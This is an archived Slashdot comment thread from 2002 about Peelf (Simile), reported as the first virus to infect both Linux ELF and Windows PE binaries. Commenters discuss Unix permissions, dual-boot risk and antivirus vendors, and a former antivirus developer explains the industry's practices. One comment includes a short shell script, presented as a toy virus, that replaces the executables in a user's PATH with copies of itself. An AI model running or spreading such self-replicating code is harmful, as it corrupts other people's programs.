Forgot your password?

Win32/Linux Cross-Platform Virus 582

Posted by michael
from the 20-klez-a-day dept.
An Anonymous Coward writes "Symantec reports on the first virus to infect both ELF and PE binaries on Linux and Win32. "The first Win32/Linux cross-infector, {Win32,Linux}/Peelf, uses two separate routines to carry out the infection on PE and ELF files. This variant of Simile shares a substantial amount of code between the two infection functions, such as the polymorphic/metamorphic engines, the only platform-specific parts being the directory traversal code and the API usage.""
This discussion has been archived. No new comments can be posted.

Win32/Linux Cross-Platform Virus

Comments Filter:
  • by Anonymous Coward
    No crossingover to this platform
  • by forged (206127) <> on Sunday June 02, 2002 @02:51PM (#3627150) Homepage Journal
    ...not to be logged in as root. At least the typical Linux user can limit the damage this way.
    • by Anonymous Cowrad (571322) on Sunday June 02, 2002 @02:59PM (#3627195)
      Sure you can limit it, but losing ~ is still a bitch. If anything, I'd rather lose everything but ~ because that's where my files are changing all the time. Everything else is fairly static, so rolling back to yesterday's backup isn't so bad.

      • If you mount FAT (and NTFS too?) volumes under linux as read-write, if you get infected under Linux, it will scan your volumes for PE executables as well. It will infect your Windows volume while you're under Linux.

        The thing is that the majority of LInux users (I think) are dual booters, so this would give the virus a prime target to hit.
      • by RelliK (4466)
        All the files in my home directory can fit on a single CD with plenty of room to spare. Restoring some files from backup is much much easier than first reinstalling the OS, and *then* restoring some files from backup.
    • by garett_spencley (193892) on Sunday June 02, 2002 @03:23PM (#3627305) Journal
      Someone else already mentioned this but I'll say it again.

      There is no difference as far as I'm concerned as losing my entire system or losing my home directory. You're right that at least if you don't use the root account to catch the virus only your own files would be destroyed but really the files in my home directory are the only files that I care about getting destroyed.

      It only takes me about 10-15 minutes the get my system back up if I had to reinstall. It's all my personal files that can't be replaced that would make the experience traumatic.

    • by the_radix (454343)

      typical Linux user

      The problem here is that virii are spread the most by the least knowledgable. I've seen people "try out that Lye-nucks thing" and just cruise around as root. The don't know that it's insecure, just as they don't know not to open up attachments from friends. A typical Linux user may limit his or her damage, but a newbie can do a hell of a lot more damage using Linux than using MacOS.

    • Not Necessarily (Score:5, Informative)

      by cscx (541332) on Sunday June 02, 2002 @03:29PM (#3627346) Homepage
      Here's how it works:

      When an infected file is run, it infects other Win32 files on the system. The virus prefers to hit applications written in the C language and is more likely to hit OS files then normal applications. This virus carries a string "Metaphor v1 by The Mental Driller/29A". It is not visible in infected files but this string (with the lettercase changed randomly) is displayed on the 17th of March, June, September and December:

      On the 14th of May on systems with Hebrew character support the virus will display a message box saying "Free Palestine!".

      This virus is polymorphic and uses entry-point obfuscation technique. When infecting, the virus replaces all "ExitProcess" calls in the host file with obfuscated jumps on a polymorphic decryptor. The obfuscated polymorphic jump, the polymorphic decryptor, and the encrypted body of the virus can be anywhere in the host file which makes detection a difficult task.

      Although detection is complex, AVERT has decided to include detection using the ActiveDAT technology in the scanning engine and DATs. As a consequence, some users may notice a slight performance decrease after updating to 4189 DATs. This is a necessary tradeoff for obtaining detection of a known "in the wild" virus. To allow users some flexibility, AVERT has included detection for this virus ONLY when Program Heuristics are turned on. AVERT will continue to work on improving the detection of this virus to reduce the impact users may see. Improvements will eventually be noticed in future DATs.

      The sample of this virus was sent on 14 Feb 2002 to fourteen different AV companies by the virus author. In about 2 weeks the virus sample was also circulated in an electronic magazine distributed by 29A virus writing group (version 1b). A slight modification of the same virus was created from the published ASM sources and it carries a different string ("Deutsche Telekom by Energy 2002*g**") displayed on the 18th of March, June, September and December:

      Infects Win32 applications with ".EXE" extension only in folders not starting with letter "W". The virus also avoids programs with a letter "V" in the name or starting with "F-", "PA", "SC", "DR" and "NO". However it lists all available network drives and looks for potential writeable targets there. After the infection date and timestamp of files do not change.
      In most targets the virus wipes out the relocation section of the host file. Files can still run but that makes proper cleaning impossible.
    • by jukal (523582)
      > ...not to be logged in as root. At least the typical Linux user can limit the damage this way. Ofcourse, you should root yourself only when you really need it, but still I think what is maybe even more important is that your patches are up-to-date.

      Why, because you are likely to get the virus through a bug. If the virus can find an exploit to penetrate your system, then it's very likely that it will also find the local root exploit to do anything it wants.

      You really need to close all the entrances.

      Prophecy: look 6 months forward and we will see virus/worm that, after entering your system, scans it for weak points, after that it downloads the suitable root-exploit just for your box, runs it and starts the bugparty. At that point, lazy maintainers will get a cure for their laziness.
  • by overturf (193264) on Sunday June 02, 2002 @02:51PM (#3627151)
    Whew! For a second there I thought it was a virus that could infect Linux (which is, of course, not possible). What a relief that it's a virus that only infects Win32/Linux!
  • by Anonymous Coward
    If my memory serves me right the first windows/linux virus, was the Lindose.

    For more information see: se.sht ml
  • More proof (Score:4, Insightful)

    by Isaac-Lew (623) <`isaaclew' `at' `'> on Sunday June 02, 2002 @02:55PM (#3627171)
    OK, we're going to trust an anti-virus vendor about a virus/trojan that would be difficult (if not impossible) to spread in the wild? I haven't read *anything* about how this would attack a Linux system (does it cause a buffer overflow? Does it edit a system config file? Do you need to somehow accidentally execute an email attachment?).

    I think that this was cooked up in Symantec's labs in order to scare people & possibly serve as an ad for their software, especially if they have a "solution" that runs on Linux.

    • Re:More proof (Score:4, Insightful)

      by Corgha (60478) on Sunday June 02, 2002 @03:52PM (#3627440)
      (had to post this as "Code" to get around the lame lameness filter)

      I think you've got a good point. To quote Symantec:

      "So far Symantec has not received any submissions of this virus from customers."

      For any OS, there will always be code which, when run with the appropriate privileges, can cause some damage. That's why viruses are mainly a social problem. Just to prove how pointless this all is, here's my first simple-minded attempt a writing a Linux virus:

      for file in `find \`echo $PATH | sed 's/:/ /'\` -xdev -type f` ; do
      if [ -x $file -a -w `dirname $file` -a ! -e `dirname $file`/.`basename $file`.orig ] ; then
      mv -f $file `dirname $file`/.`basename $file`.orig && cp -f $0 $file
      ) > /dev/null 2>&1 &

      echo '1 4m 4 rh347 h4x0r! ph33r my b45H s|<|11z!'
      [ -x `dirname $0`/.`basename $0`.orig ] && \
      exec `dirname $0`/.`basename $0`.orig "$@"

      ta-da! a trivial example of a "virus" that "infects" all executables in a user's PATH, and works even on non-x86 machines and UNIX machines with shellutils installed (with a little sed work, even that requirement could be removed).

      What does this prove? Nothing. Neither does this Simile virus, until it starts mailing itself to people and popular Linux email clients start automatically executing attachments in the preview pane.

      Of course, with all the idiots I see sending out mail as root, maybe this isn't too far off.
    • I think that this was cooked up in Symantec's labs in order to scare people & possibly serve as an ad for their software, especially if they have a "solution" that runs on Linux.

      That's the most paranoid thing I've seen here. Do you really think Symantec is going to risk its entire profitable operation just to piss off some self-important Linux users? I seriously doubt an organization that large is capable of keeping such secrets especially when it would be such a great story to sell to the media.

      If we're going to be calling out the chicken-littles well why was this posted when its threat level according to symantec is low? I think this has more of academic interest than anything else. If you're going to blame anyone, blame slashdot for posting a low-threat virus. Symantec is doing its job and I see no wrong doing on their part. I also don't think slashdot is doing any wrong, its really the invetible conspiracy theorists like yourself who are putting a negative spin here.

      There's no reason for any anti-virus vendor to bother starting their own viruses. There are just too many kiddies willing to do it for free. Ironically, the DIY computing culture is also notorious for defending all sorts of exploratory cracking for the sake of the thrill or to see if it can be done. If you have conspirators I'm sure they're from Linux's own backyard and probably not from Symantec's labs.
  • by Mordant (138460) on Sunday June 02, 2002 @02:55PM (#3627175)
    While working to convince many of my friends and colleagues to give Linux a try, one of the most vexing hurdles I've come across is the following:

    Me: "Dude, you should really try Linux! It's fast,
    it's free, it's really secure - and, best of
    all, you get all the source code, so you can
    see how it -really- works, and even contribute
    your own code, if you want."

    Dude: "Is there antivirus software for Linux?"

    Me: "Well, no - Linux doesn't have viruses,
    per se, so there's no need for antivirus

    Dude: "My bosses won't let us run any boxes
    which don't have antivirus software
    installed. Let me know when I can buy
    antivirus software for Linux."

    So, now that we have virii on Linux, we'll soon have antivirus software, and I can show my friends yet another way in which Linux has caught up with Windows!
    • by gmack (197796) < minus painter> on Sunday June 02, 2002 @03:02PM (#3627214) Homepage Journal
      weve had that for awhile.. so the PHBs could have been happy for months. for starters and there are plenty more.

      Nice to run on Linux mailservers.

    • by mosch (204)
      There's actually lots of anti-virus software for *nix, though sometimes it's hard to purchase. Typically it's used to scan data that may be passed to non *nix machines, via http, ftp or email.
      • though sometimes it's hard to purchase.

        I'm sure none of the developers would mind selling you a copy of their GPLed software, if you really had an urge to pay for it. *grin*
    • I believe that F-Secure has been making anti-virus products for Linux for a long time now.
    • by GoRK (10018)
      F-Prot is available for Linux (non-commercial use is free) and it's very good. I have even seen it detect viruses that were not in its database yet. Updating my DAT files resulted in my ability to disinfect the virus. It detects and can disinfect about everything. I will scan your .prc and .pdb files for PalmOS viruses, even!
    • by tringstad (168599)
      Trend Micro, who is one of the better Anti Virus vendors, if not the best, IMHO, has been providing Linux anti-virus software for as long as I have been aware of them: []

    • It may sound daft, but it's not a totally unreasonable stance. One of the features of most antivirus products is that they can give daily updates for newly found viruses, so in theory you are permanently protected. You may be running an OS that has no viruses today, but however confident you may be, there is no way that you can guarantee that there will never be a virus for it, and without something that would update and protect you if this did happen, how can you be sure that you are safe?

      I'm not claiming that you he's right and that you should be running antivirus software, but I can at least see where your "dude" was coming from.
      • The problem with todays worm hybrids is that the 'permanent' protection often turns out to be 'the protection you needed yesterday today'. Most large corporations suffering from the mail worms do have extensive virus protection. The daily updates are a day late. Which leaves you pretty much permanently vulnerable.

        Virus protection software just isnt enough. Disallowing any form of executable attachments (including any and all forms of documents that can or do support macro languages), and securing systems with privilidge based access to executables will get you much more security. Of course you'll have to keep up good standard practices of minimum running services and frequent patching too.
    • by WetCat (558132)
      There IS antivirus software for linux,
      for example good ones can be bought at
  • Linux get's (Score:4, Funny)

    by incom (570967) on Sunday June 02, 2002 @02:55PM (#3627176)
    more and more windows fucntions everyday. Hopefully this new feature encourages some more switchover to linux.
  • Not the first (Score:5, Informative)

    by kill-hup (120930) on Sunday June 02, 2002 @02:56PM (#3627178) Homepage
    This is not the first cross-platform Win/Linux virus: [].

    It is the first to use pretty much the same injection code routines for both, though. The previous virus I referenced had two separate infection routines for PE and ELF files.

    • So far Symantec has not received any submissions of this virus from customers.

    Nonetheless you are encouraged to update your virus definition files to the latest and greatest. And for you who don't have an anti-virus software yet, this was the subliminal message in the announcement that you need to buy one !

  • by Myuu (529245) <> on Sunday June 02, 2002 @03:03PM (#3627220) Homepage
    [root@bigassopendomain /]./virus
    "virus" requires the following dependancies
    please check the path and filenames and try again
    [root@bigassopendomain /]
  • by Anonymous Coward on Sunday June 02, 2002 @03:03PM (#3627221)

    Well, looks like this does not affect those using Linux on PowerPC, Sun, or any of the other platforms supported.

    On a lighter note, if this virus were open source it would compile to the other platforms. Someone should post a link to the Sourceforge page, with links to source tarballs as well as Debian and RPM packages.

  • .. is supposed to spread around?

    Infected win executables run on windows, ELF executables run under linux.. I don't think there are that many programs crossing the wall between the two platforms.

    But probably i'm forgetting about wine, vmware and dual-boot machines ;P
    • As stated, it scans networks looking for infectable files. The process would go something like this:
      1. 1D10T introduces some kewl "screensaver" or whatever to a Win98 notebook while traveling
      2. Goes home, lights up infected machine on corporate network
      3. Machine spots some -rwxrwxrwx file on the network
      4. Which is later executed by unsuspecting Linux user
      5. For real fun, the mysadmin who let a world-writable executable exist invokes it while su root.
      Alas, far too many *nix networks still have the implicit assumption that all of the machines connected to them are securely maintained. I know of at least one very large company where any machine on the network can get root NFS access by just spitting out the right packets -- and there are Win98 machines on the same network.
  • So this virus thing links against my GNU code, does it?

    Where can I download the source?!?
  • by gorf (182301)

    So far Symantec has not received any submissions of this virus from customers.

    From this I infer that the virus was not found in the wild. So where from, exactly? I'm thoroughly confused, this makes no sense.

    • Found this (Score:4, Informative)

      by martissimo (515886) on Sunday June 02, 2002 @03:29PM (#3627347)
      at McAfee's website here []

      btw the linux version has been known about for a few weeks now according to their dates.

      but anyways when the original variant came out in February they state...

      The sample of this virus was sent on 14 Feb 2002 to fourteen different AV companies by the virus author. In about 2 weeks the virus sample was also circulated in an electronic magazine distributed by 29A virus writing group (version 1b).

      lots of info about what it actually does to windows machines there, but almost nothing about what it does on Linux

  • So... (Score:2, Funny)

    by InsaneCreator (209742)
    When will the virus be available under GPL? :)
  • by wildcard023 (184139) on Sunday June 02, 2002 @03:31PM (#3627352) Homepage
    A virus needs to start somewhere. The code doesn't magically appear in your system. In order to get a virus on a Linux box, you need to download an infected binary (or the actual code and compile it) and then run it. Once you run it, it needs to search for another binary that it can infect (has write permissions to) and then modify it.

    The reason that it's hard to infect a Linux (/Unix/anything with a decient permission structure) system is that hardly anyone runs daily activities as root and only updates their /bin, /usr/bin, etc binaries from a known source or from source code. If some user runs the virus, it will only be able to infect files that he has write permissions to and on most Linux boxes (at least the distro's I've seen), users aren't allowed to write to systemwide binaries.

    The virus is "kinda neat" as far as it's ability to infect multiple platforms and avoid detection, but is really "no big deal" to most systems out there. Windoze(tm) users get viruses sent through email (usually via worms) that self execute when they're opened. This infects files that they have write permission to (usually all of them since 9x boxes have no permission structure and most users on NT systems are run in the Administrator's group) and causes system havoc. Since no Linux mail readers that I know of will execute binaries without at least asking, the user would have to specifically download the binary and run it. At that point, all I have to say is "duh".

    So how do you infect your Linux box? On purpose...with a lot of effort. How does this effect the rest of us?

    *pause* *giggles* </Bubbles>

    Mike Nugent
    • If some user runs the virus, it will only be able to infect files that he has write permissions to and on most Linux boxes (at least the distro's I've seen), users aren't allowed to write to systemwide binaries.

      There is one distribution where users are always logged in as root. It is called Lindows. In one of the reviews (search old articles on /.) they were actually able to run Outlook viruses and other Microsoft transmitted diseases on Lindows!

      But yeah, you are exactly right about security of Unix vs. Windows. On Unix, regular users are simply incapable of infecting the system even if they wanted to. Windows, however, is stuck in the single-user mentality. It's really a shame cause NT does have filesystem-level security and theoretically, it could be just as secure as Unix. The problem is that most applications *expect* to have complete access to the system, making a locked-down NT largely useless. Everywhere I worked, all the users have Administrator access on their local machine, and always run executable attachments (well, the ones that don't execute automatically that is :-)

    • Old but never say never

      A buffer overflow vulnerability [] exists in the popular mail client Pine 4.21 (and possibly earlier versions), relating to the function which regularly checks for incoming email.

      The real concern here is that this requires no user interaction to exploit.. a target need only be using a vulnerable version of pine. The overflow occurs when the user recieves new email. While typically not yielding root privileges (unless root reads email with pine AS root) this can be used by a remote, anonymous attacker to gain local access to the target host.

  • Cool! (Score:5, Interesting)

    by mindstrm (20013) on Sunday June 02, 2002 @03:34PM (#3627372)
    Now.. if only we could get those same brilliant minds working on a compiler that produces a single executable that works on both platforms, and shares as much code as possible.

  • by athakur999 (44340) on Sunday June 02, 2002 @03:38PM (#3627385) Journal
    Usually when a company releases a software package, it comes out on Windows first. Those running Linux usually have to wait a few months for a Linux port to be released, if it ever does at all.

    I praise this virus writer for releasing Windows and Linux versions of the software simultaneously. If only other companies would follow their lead.
  • by handsomepete (561396) on Sunday June 02, 2002 @03:45PM (#3627414) Journal
    ...there's a group of people trying to get Windows-only virii to run via wine to see if they can get faster infection times under Linux.
  • A True Test (Score:4, Insightful)

    by PRickard (16563) <pr AT ms-bc DOT com> on Sunday June 02, 2002 @04:09PM (#3627494) Homepage

    A lot of people have said Linux has fewer viruses than Windows only because Linux isn't as widely used... Well, this is the chance to do some comparisons. How devastating is the cross-platform virus to each system, and how fast does it spread on each?

    Also note that it's a virus, not a security hole or flaw in the system - this doesn't make Linux less secure like a Melissa-type problem that takes advantage of holes made by one company's stupid software bundling decisions.

  • by h4x0r-3l337 (219532) on Sunday June 02, 2002 @04:14PM (#3627508)
    A hybrid virus could have its own filesystem code, and thereby infect say a linux partition on a dual-boot machine that is currently booted in windows, or vice-versa. The real killer here would be that your regular user-ID based security wouldn't help at all. While running in windows, the virus would have unlimited access to the linux-partition, enabling it to infect linux binaries it otherwise would only have been able to touch when run as root. And while running in linux, it could infect binaries on a FAT partition without having to worry about the virus-checker getting in the way. In fact, it could easily infect or replace the virus-checker itself.
    • Nice one--that is scary. The only way around that one would be to keep both drives electrically separate, maybe using a switch like the Trios [] (warning, link has Flash). Now they have a selling point!


    • Freakin' Genius (Score:3, Interesting)

      by Otto (17870)
      Now that's really some good thinkin' there. Completely bypasses all your security because you're not running any of it. Take it a step further, a virus that infects and spreads on Windoze, where it's easy to do, but finds Linux partitions, roots them and installs its own backdoors and so forth.

      Kinda scary. Next time you're in linux, it connects to somewhere over the net telling the author another box has been rooted and voila, he ownz you.

      Kinda a good reason not to run Windows in dual boot mode I'd say.

      There's some preemptive stuff you can do with this though.. Have a kernel module (possibly compiled in) that does checksums all your major binaries before booting and warns you when they've changed. Of course, the virus has total kernel access too, so this may not be effective if the author planned for it.
  • My congrats go to the coder who was behind this, a good job well done.

    The whinning security-experts will never see the beauty in this. A polymorphic engine?
    when was the last time there was a real polymorphic virus? and a cross-platform one at that.

    Another kudos flies to "the whale" aka "motherfish". The first polymorphic virus, EVER.

  • by observerk0 (562512) on Sunday June 02, 2002 @04:48PM (#3627634)
    This gives the open-source community a great chance to prove that distributed development does indeed get fixes for viruses out faster. You can bet that MicroSoft will be doing its best to beat Linux to the punch with a patch and if it succeeds, expect it as a cornerstone to the "We have the way out" marketting campaign as well as a key point in every future MS exec's anti-open-source tirade.
  • by RinkSpringer (518787) <rink@r[ ].nu ['ink' in gap]> on Sunday June 02, 2002 @05:16PM (#3627722) Homepage Journal
    This seems more like a proof of concept to me than a real virus. Especially since the author specifically emailed the virus to anti-virus labs, it's more like: See, it *can* be done.

    Of course, you could expect that. Basically, a virus relies on just one thing: privileges. Privileges means the possibility to mess other programs up. And because there are so much Windows virusses compared to other OS-es, it's easy to see Windows handles rights... differently... than a secure OS :)

    I don't think Linux, or UNIX viruses in general, will become a real threat. As long as you use your brain and don't do everything as root (as about every guide warns you against anyway), you'd be rather safe. Can't mess up stuff without the rights to do so.
  • by drsolly (415856) <> on Sunday June 02, 2002 @07:57PM (#3628217)
    The short answer is no. The longer answer is given below.

    First, I'll explain who I am. I'm Alan Solomon, I'm a programmer, I designed and coded the engine in Dr Solomon's Antivirus, that engine is now also used in the McAfee (Network Associates) scanner (although I'm sure that by now it's somewhat different from the engine I wrote).

    I worked in the AV world from 1988 to 1998. I'm doing other stuff now, I don't have any ownership in any antivirus companies. Also, caveat, I've been out of this business for a few years, so my knowledge-state isn't current. And, of course, I really can only speak for myself, and the company that bore my name. I can't really speak for other companies.

    I used to get asked "Do antivirus companies write viruses?" a lot. It is, of course, a very insulting question, like asking firemen if they start fires, or dentists if they're the cause of tooth decay. However, I always tried to contain my irritation at the insult (on account of my guess that most people asking me this, don't realise it's an insult) and the answer is "No."

    1. It's unethical. But I guess if you believe that the antivirus folks are a bunch of unethical scroats, that's not a very convincing reason. Actually, the technical folks in the AV industry have to be *very* ethical. Because unethical ones tend not to be accepted by the consensus, and thereby lose a crucial source of information exchange.

    2. It's illegal (actually criminal, virus authors have been put in prison for this. Chris Pile (the "Black Baron") got 18 months, for example). And you can get caught (ask Pile). If you think a company could ask a programmer to write a virus, and hope that no-one else in the company would know about this, and that there's no risk of jail - think again. You have to be *really stupid* to write a virus when you're not able to guarantee anonymity. Of course, you have to be pretty stupid to write a virus at all. By the way, 99% of the viruses that I analysed were really crudely made; some didn't even work at all.

    3. There's no point. Kids all over the world are writing viruses at no cost, providing an ample supply of new stuff.

    4. It takes too long. I'd estimate that the Simile virus, as described, took months and months to develop. It took McAfee two weeks to do the detector; Symantec about the same. So, if the AV companies had to write the viruses as well as do the Antivirus, they'd need 10 or 20 times as many programmers. And you'd have to keep that lot a deadly secret, of course.

    You can't imagine what it's like in a virus lab. There's N new viruses per month, where N isn't a fixed number. And there's M people to do the analysis and coding, and M is never enough. It was like being on a treadmill, and you know that the treadmill is getting faster all the time. Write new viruses? ::laughs hysterically:: We barely had time to post on alt.comp.virus in Usenet.

    So why do antivirus companies sometimes see viruses before any users? Simple. The virus authors send them. The first time this happened was over a decade ago; it surprised me then. And we thought it through at that time. Do we just delete it, and pretend it didn't happen? If you've been sent a virus, and you think you're the only person in the world who has a copy of that virus, you can destroy it, and the world has one virus less. But if there's a chance that the virus author has, or will, release it in the wild, you have to build detection for that virus.

    Also, you have to give a copy to the other antivirus companies. Because we programmers made an agreement between ourselves that we wouildn't force users to buy three different products to detect three different viruses, that we wouldn't compete on the basis of "we can detect X virus and no-one else can". We'll compete on price, speed, accuracy, tech support, etc etc, but not by restriction of virus samples between trustworthy AV companies.

    So, once the virus author gives it to one AV company, all the AV companies have a sample (shortly after) and that virus might not be in the wild, and might never get into the wild. But you can't be sure. For this virus, we read that the virus author sent it to 14 AV companies.

    There's a separation in AV companies between the programmers, who do the virus analysis and coding, and the marketroids, who do the, uh, marketing. The marketroids are constantly trying to persuade people to buy AV software, the programmers constantly trying to hold them in some degree of responsible check. The progammers do have a degree of control, via mechanisms that we put in place a decade ago, but it's impossible to persuade anyone that when a new and technically interesting virus comes along, that people should not be told. You really can't, and shouldn't, try to keep a new and technically interesting virus, a secret. Of course, then the media get their paws on it, and blow up a scarestorm. How do we stop that? I don't think we can.

    I haven't seen or analysed this virus, but from what I've read, it does look A) technically interesting, and B) a complete pig to design detection for (detection means, you always spot the virus when it's there, and you never give a false alarm when it isn't). This virus is technically interesting because it's cross-platform. And it's a complete pig to detect because B.1) it's polymorphic, meaning if you put several samples side by side, there isn't any byte-string that you can be sure will be in all of them, B.2) it's metamorphic (meaning, it's horribly horribly polymorphic, even after you decrypt it you don't have any constant byte-string) and B.3) entry-point obfuscation (which means you don't even know where to start looking for the virus, all you know is that it might be somewhere in the file).

    The fact that the AVERT folks (McAfee) have admitted that this one virus will cause "a slight performance decrease" in the virus scanner, means that this is a significant virus; pretty much every virus causes a near-zero impact on scanning speed. I'd guess that "ActiveDAT technology" means "we've encoded some executable code in the DAT file which the scanner will run". In other words, they had to write a subroutine specifically for this virus.

    That's something that you don't expect to do more than once every couple of years or so.

    Next - can viruses infect Unix, despite the unix security system?


    First, I'd point out that Fred Cohen's doctoral thesis on viruses in 1986, was done using unix boxes. Viruses do not break system security. They infect wherever the system security allows them to, and that's sufficient for them to spread. I'm not expecting a sudden wave of infections on Linux boxes, but please don't think that viruses cannot work on Linux.

    One problem, is that the distinction between an executable and a data file is very grey. Try this simple experiment. Take a simple perl script,, and change the permissions to 400. Now try to run it. Unix security stops you. Now try running "perl", and it will run fine.

    And think about macros in documents. They will run even though the document has non-executable permissions.

    See, it doesn't matter that you can't infect ls or ps or df. All it takes is for you to be able to infect your own user-written stuff.

    And by the way, you can infect ls and ps and df. Every now and then, I log in as root, to do some maintenance-type thing, or install something. And while I'm root, if I run a virus-infected program, then the virus has root privilege, and can infect ls and ps and df and anything else it wants to.

    OK, so now we've established that you can infect your own software, let's consider damage. A Linux virus will be prevented from deleting the system files, or from formatting the hard disk, by the system. But since it's running with the same privilege that I (as an ordinary user) has, it has the same read, write and delete access to my data files that I have. And, of course, my data files are the only files with real value on the computer. The Linux system itself can be reinstalled in minutes.

    I've gone on too long already. I better stop before I write another book.
    • by Todd Knarr (15451) on Sunday June 02, 2002 @08:14PM (#3628266) Homepage

      And by the way, you can infect ls and ps and df. Every now and then, I log in as root, to do some maintenance-type thing, or install something. And while I'm root, if I run a virus-infected program, then the virus has root privilege, and can infect ls and ps and df and anything else it wants to.

      This does ignore one trait of Unix users, though. Normally I run as a regular user, and I don't have permissions to write to system files or root's personal files. All I can infect is my own, and all my executables live below my home directory. When I su to root, I have things set so that the path automatically gets reset to the system defaults which do not include anything under home directories and most emphatically doesn't include the current directory. This means that, as root, I can't run any of the files that might have been infected by a virus run by any regular user without jumping through some hoops first (which I'm unlikely to do exactly because they're dangerous and unneccesary). This vastly reduces the ability of a virus to spread across the system. Not eliminates, I can always do something stupid, but vastly reduces.

      A virus can destroy my data files, but that's why backups were invented. At worst I lose a day or so's worth of work, whatever was done since the last backup. The new generation may be different, but the older of us view backups as somewhere between a religion and an obsession. This should be system-independent, really, and in this day of cheap CD burners and large-capacity Zip and Orb drives and such there's no excuse.

      • by drsolly (415856) <> on Sunday June 02, 2002 @09:40PM (#3628497)
        Your rootly precautions are good; my point is that a user doesn't need root privilege to get infected and lose data, and a file doesn't need executable privilege in order to get executed.

        At worst?

        Destroying data files isn't what you should worry about; as you pointed out, that's easy to fix.

        Far more worrying is a virus that makes minor changes to your data files. And how long will it be before you notice? And how old a backup will you restore?
        • by Permission Denied (551645) on Monday June 03, 2002 @12:36AM (#3629132) Journal
          First, I'd like to thank you for creating a slashdot account and contributing to the discussion.

          Now, my question: I still don't understand how a virus could get widespread on Unix. A worm, yes, but not a virus (eg, the Morris worm and that redhat LPRng thing a year ago).

          I agree that if I run an infected executable as root, I'm screwed. I'll even say that if I run an infected executable under my regular user account, I'm equally screwed because it's my data that's important, not the system (as you point out).

          However - here's the big difference - how am I going to end up running an untrusted executable? My mail client never runs untrusted code. In fact, if someone sends me an elf binary, I have to go through several steps in order to save it, chmod it and then run it from a terminal. In Windows, you can get emailed a .exe attachment and you can double-click on it and it runs. This is where that lack of distinction between programs and data actually helps: nothing is a program until I decide it's a program. When I download a perl script using netscape, it will first get 0644 permissions, so it won't be run via the hash-bang mechanism even if it's in my PATH and it won't be run by "perl" unless I type that into a terminal. If I do something stupid, like making netscape's handler for .pl files "perl %s", then, yes, I'm in trouble, but the default configuration for netscape does not use any interpreters.

          Basically, my point is that I have to go through some trouble to intentionally run a program downloaded off the 'net, which makes it unlikely that I'm going to run a program unintentionally. As for stuff that I run intentionally, those would be source tarballs and the occasional binary executable install program. For these, I just have to trust the origin of the program, but I get to make that decision.

          About the only thing I'm worried about virus-wise is that if some closed-source program like Realplayer has a method for embedding executable code in audio streams, or if AOL's instant messenger program embeds commands in its chat protocol. This is the confusing of data and programs that you mention. Another example would be emacs's auto-execution features. For example, you can add this to the bottom of a file:

          # vi:ts=4
          # vim:et:ts=4
          # Emacs:
          # tab-width:4
          # indent-tabs-mode:nil
          # End:
          This tells emacs, vi and vim to use four-space tabs. Now, emacs is a full programming language, so if one could embed arbitrary lisp forms in this manner, this would cause problems. However, the emacs people already thought of this, so it won't work.

          Another thing that scares me is auto-update features for binaries. For example, if Realplayer includes an auto-update feature, someone can hijack their servers so my next auto-update contains some new "features." But then, if someone hijacks Real's domain, they can just change the binaries I initially downloaded intentionally. I don't see how a virus scanner could help me out here as anyone who does this is likely to write their own little program in C or assembly.

          I'm not familiar with the state-of-the-art in virus scanners, but I can think of a number of ways to obfuscate arguments to system calls, or even encrypt the code that performs system calls and do it all without using libc - I don't see how any heuristic approach could differentiate a rootkit from an media player installation program. Perhaps a virus scanner could detect the popular rootkits and the popular encryption methodologies, but how it's going to tell that the "unlink" system call called with "getenv(HOME) /.realpayer" is OK but "unlink getenv(HOME)" is not OK? Especially if the arguments are not static strings but are put togehter in some fashion and the code for the system calls is taken from .data, copied to the stack, unencrypted using an algorithm I just made up and then jumped to (and the target for the jump is calculated using some complex formula, so you can't search for simple jumps into stack). And this is all off the top of my head - I've never even written any code that runs on the stack. My point is that if someone is knowledgeable enough to break into a server I trust, they may be knowledgeable enough to write a program that bypasses a virus scanner. And if this is the case, why even mess with a virus which attaches itself to other programs instead of installing a rootkit and sending off my IP somewhere? It doesn't make much sense to me.

          There are plenty of unix security issues that keep me on my toes, but these involve buffer overflows in network daemons and setuid programs, poorly written perl cgis and php scripts, firewall scripts, tripwire configurations, etc. - I'm not worried about viruses. The distribution mechanisms that virus kiddies use just don't exist in Linux.

          • by drsolly (415856) <> on Monday June 03, 2002 @09:01AM (#3630180)
            Worm ... virus ...

            To most people, there's no difference whatsoever.
            To AV folks, a worm is just a particular subset of the class of viruses.

            Klez, the number one virus today, is a worm. I haven't checked the numbers, but right now, I'm guessing that email accounts for 99% of virus (i.e., worm) transmission. And I'd guess that the majority of in-the-wild viruses today, are worms.

            How could a virus get widespread on Unix? First, you have to drop the assumption that all Unix users are sophisticated /. readers. Increasingly, as Linux becomes more and more popular, Linux users are going to be no more sophisticated than
            the average user today.

            And when Mr Average User is running his point-and-click email system on Gnome, and a known and trusted friend (spoofed address) sends him "Funny Joke" or "Useful Program" the likelihood of him clicking on it is just as great whatever OS he's running.

            OK, clicking on it won't work, it's 0644. Or will it be? And does it matter if it's 0644, maybe it can still get executed?

            I haven't tried to write a virus (see my original posting), but you can be sure that whenever AV folks get together and have a few beers (beer is crucial to the AV industry) one of the subjects that comes up is "what if?". And we talk about techniques for writing interesting and difficult-to-handle viruses. This speculation is useful, of course, it makes us think ahead. Well, that's how it was a few years ago, I guess it's the same now.

            So, let's speculate a little (and I haven't tested any of these ideas with any mailers or Linux UIs).

            What if you emailed a tar file, and the mailer is set to untar it (AOL has a neat feature, when someone receives a zip file, AOL automatically unzips it)? Now you have a 755 file, right? User executable - now all you need to do is persuade the user to click on it, which has never been a difficulty. "Click here".

            Or how about your suggestion. Persuade the user to open a terminal window and type perl funnyjoke. Mr Average User really doesn't understand the consequences of doing that, especially when the original email came from a trusted source (or so he thought). It doesn't feel to him like he's bypassing a security system. I mean, what kind of security system is it that can be bypassed so easily?

            Or how about this. In the user's home directory, there's .bash_profile. That's 644, the user can overwrite it, or change it (and if the user can do that, maybe some mailers can replace it with an incoming enclosed file, the mailer has at least the same privilege as the user). And then the next time that user logs in, he runs that revised script.

            The distinction between executable and non-executable isn't as black and white as one might have thought.

            Now consider Word (and Office in general). A lot of people have opined that the non-existence of a good Linux Word-compatible program is one of the barriers to Linux acceptance in the corporate world. So, suppose someone made such a clone. Now you have the whole macro-execution thing to worry about. Users get emailed a document written in Word for Windows; the macros also work under Linux, because the platform is Word, not Windows or Linux. Word for Windows macros work just fine on Word for Mac (at least, they did a few years ago, things might have changed since I was current, but I doubt it).

            And Jane User has write access to all her own documents. And then emails one to a colleague ...

            Now, what about us sophisticated folks, how could we get hit by a virus?

